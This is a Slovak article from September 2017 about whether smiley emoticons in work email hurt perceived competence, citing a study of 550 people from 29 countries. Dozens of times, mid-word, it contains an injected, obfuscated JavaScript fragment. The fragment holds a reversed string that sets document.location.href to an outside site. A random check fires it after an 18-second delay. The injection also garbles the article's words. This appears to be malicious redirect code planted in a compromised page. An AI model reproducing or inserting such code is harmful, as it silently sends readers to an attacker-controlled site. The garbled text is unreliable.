Pozor na smajlíky v práci

| september 19, 2017

Digitálna komunikácia zažila za poslednú dekádu a pol nevídaný rozmach a priniesla so sebou viacero noviniek, ktobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toré prevzala svojho osobnejšieho súrodenca. Jednou z nich sú emotikony (alebo hovorovo smajlíky), ktobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toré dnes už považujeme za takú samozrejmosť, že si komunikáciu bez nich – napríklad na sociálnych sieťach – ani nevieme predstaviť.

V pracovnej elektronickej korešpondencii však stále ide o pomerne diskutabilnú záležitobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tosť, s ktobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}torou sa potýkajú milióny ľudí. Komu si človek môže dovoliť poslať známy emotikon :)? Bude tobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to pôsobiť priateľsky? Alebo skôr pasívno-agresívne? Alebo dokonca amatérsky a nútene?

Viac svetla do tejtobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to dilemi vniesol nedávny výskum, pri ktobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}torom spojili sily odborníci hneď z troch univerzít: Amsterdamskej univerzity, Univerzity v Haife a izraelskej Ben-Gurion univerzity. Experti na psychológiu a pracovné vzťahy ho realizovali na vzorke 550 účastníkov z 29 krajín sveta.

A zistenia, ktobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toré z neho vzišli, sú pomerne zaujímavé. Smajlík tobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}totiž podľa drvivej väčšiny respondentobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tov neposilňuje priateľské vnímanie. Naopak, skôr môže obmedziť výmenu informácií a takmer polovica opýtaných uviedla, že použitie emotikonu – predovšetkým pri prvých e-mailových kontaktobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toch s cudzou osobou – znižuje dojem kompetentnosti človeka, ktobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}torý ho použil.

Ako mylný sa ukázal aj predpoklad, že pisateľ jeho použitím bude pôsobiť na človeka na druhej strane sympatickejšie. A ešte malá perlička – keď z e-mailu obsahujúceho smajlíky nebolo jasné, ktobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to je jeho odosielateľom, respondenti mali tendenciu si myslieť, že ho zrejme poslala žena.

Na druhej strane, výskum – hoci okrajovo – poukázal na niečo, čo má účinok presne opačný. Je ním skutobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}točný úsmev na tvári, ktobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}torý by nemal chýbať ani pri pracovnom kontakte. Ten sa však dá len ťažko vyjadriť elektronickou formou…

Fotobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to: wsj.com

Tags:

Category: HOMEPAGE, KARIÉRA

Comments are closed.